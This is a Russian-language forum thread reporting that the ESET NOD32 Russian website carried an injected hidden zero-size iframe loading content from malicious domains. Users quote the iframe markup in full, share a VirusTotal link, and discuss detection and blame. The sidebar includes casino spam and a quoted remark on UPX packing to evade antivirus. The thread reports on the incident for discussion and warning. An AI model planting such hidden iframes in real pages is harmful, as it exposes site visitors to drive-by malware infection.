Перейти к содержанию

Recommended Posts

Umnik

На http://esetnod32.ru/ висит скрытый фрейм:

</body><iframe pcvsn='j6Av392D' src='хttp://newiframe.com/s/in.cgi?6' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe></html>

Говорят, минимум второй день висит.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ALEX(XX)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Alex_Goodwin

http://www.virustotal.com/ru/analisis/4477...5fac-1258711260

newiframe.com/s/in.cgi?6script-search-www.com/index.phpscript-meta09.com/index/index.php

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
EzzO

ой ой ой, сайт антивирусной компании заражен, как-то правильно. Куда смотрят смотрящие?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion

iFrame я больше не вижу на странице.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Cooller

Уже значит убрали.

Сейчас они типа расследование будут проводить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lias

ага

По данному инциденту в настоящее время проводится проверка.

вот интересно - а взламывали ли сайты других вендоров??

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Cooller
вот интересно - а взламывали ли сайты других вендоров??

Конечно, вот например сайт антивируса Панды и не один раз.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lias

Конечно, вот например сайт антивируса Панды и не один раз.
и там тоже подсаживали трояна?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

Жесть ваще....Заговор внутри компании? ))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Жесть ваще....Заговор внутри компании? ))

м.б типичное разгильдяйство?..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
м.б типичное разгильдяйство?..

Это, скорее всего, уже как следствие! )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Ну должен же их "давно и в муках искавшийся" российский вирусный аналитик, широко известный в узких кругах "летун отовсюду", г-н Матросов, с чего-то начинать на новом месте ? :)

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion
Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Антивирусы реагируют?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

У меня при переходе по ссылке ТЕХНИЧЕСКИЙ ФОРУМ переходит на viruslab.ru - Антивирус Панды...Может они и взломали?! ))))

Ваще жесть....дааааааа

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Форум anti-malware.ru атакован спамерами?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
Форум anti-malware.ru атакован спамерами?

Это почему?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Ну по моим личным наблюдениям сложилось такое мнение :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

А сайт до сих пор инфицирован...уже и письмо им написал, и позвонил....Без толку!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Danilka
Антивирусы реагируют?

KIS 2010 да.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

А НОД не реагирует! ((

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Fox

Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Остаётся только задуматься!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • PR55.RP55
      https://www.comss.ru/page.php?id=586 При проверке ЭЦП  flash_player uVS выдаёт ошибку. ( в версии для firefox ) https://www.virustotal.com/ru/file/f3fc32449dccf88aed8a7d1f4bf35deb3064a03966f1223bcb1363d56e744b33/analysis/ Это происходит при пополнении базы SHA1 " Добавить хэши исполняемых файлов каталога в базу проверенных..." Но, не всегда.
    • Лукин Вадим
      Пришла мне в голову идея организовать самостоятельное путешествие по некоторым сказочным местам нашей Родины! Было бы здорово, если бы кто-то подсказал, где можно найти нормальные отели? Может есть какая-то прога?
    • Липковский Борис
      Моё отношение к казино вполне положительное, я уже больше полугода играю в слоты на сайте Play Fortuna Уже неоднократно поднимал там приличные деньги и не жалуюсь. Естественно и несколько раз проигрывал, но в каждой игре бывают проигрыши и это вполне нормально. На этом сайте есть разные слоты, их около двухсот штук, можно выбрать любой и на каждом из них высокий шанс выиграть.
    • Dima2_90
      Об особенностях сканирования исполняемых файлов антивирусами и доверии результатам VirusTotal - https://habr.com/post/346480/ Цитаты из статьи "Забавно, детект уменьшился с 60 для неупакованного файла и 41 для архива до 17 — при этом ни один из антивирусных движков не обнаружил Eicar, детекты явно имеют эвристический характер, а в ряде случаев напоминают ложное срабатывание (DrWeb, Baidu и др.)" "6 детектов из 67. Шесть, Карл! Все — эвристические. И скорее всего ничего не подозревающий пользователь посчитает файл безопасным." "современные антивирусные сканеры так и остались барахлом, которым были десяток-два лет назад, абсолютно пасующим перед простейшими видами упаковки кода. Решения в виде тестовых сред — «песочниц», эвристических анализаторов и т.д. только добавили неразберихи, ложных срабатываний, но по сути не защищают от реальной угрозы. Со старым, открытым и разжёванным до потрохов UPX как был бардак — так он и остался. А ведь я вполне мог упаковать не файл, вызывающий вредоносную активность, а непосредственно код, работать не с файлами на диске в %temp%, а в памяти, использовать не свободно доступные утилиты, а собственные или закрытые разработки — и таким образом обойти срабатывание резидентной защиты. Я вполне мог добавить интересные элементы интерфейса или скопировать таковой из распространённой программы — и обойти проактивку у неискушённого пользователя, который просто будет соглашаться с любыми запросами, доверяя тому, что запустил.

      То, что мы сделали выше — примитивный способ обмануть антивирус, который может понять и реализовать практически любой. И он сработал. Что говорить про искушённых специалистов!"
    • Dima2_90
      Ad-Aware --------- https://www.adaware.com/support/securitycenter/report_false_positives.php  Antiy-AVL --------- [email protected] Avast --------------- https://www.avast.ru/false-positive-file-form.php AVG ---------------- https://www.avg.com/ru-ru/false-positive-file-form Avira --------------- https://analysis.avira.com/en/submit BitDefender -------- https://www.bitdefender.com/submit/ ClamAV ------------ http://www.clamav.net/reports/fp DrWeb ------------- https://vms.drweb.ua/sendvirus ESET-NOD32 ------- https://www.esetnod32.ru/support/knowledge_base/new_virus/ Kaspersky --------- https://virusdesk.kaspersky.ru/ Microsoft ---------- https://www.microsoft.com/en-us/wdsi/filesubmission NANO-Antivirus ---- http://nanoav.ru/index.php?option=com_content&view=article&id=15&Itemid=83&lang=ru Symantec ---------- https://submit.symantec.com/false_positive/
×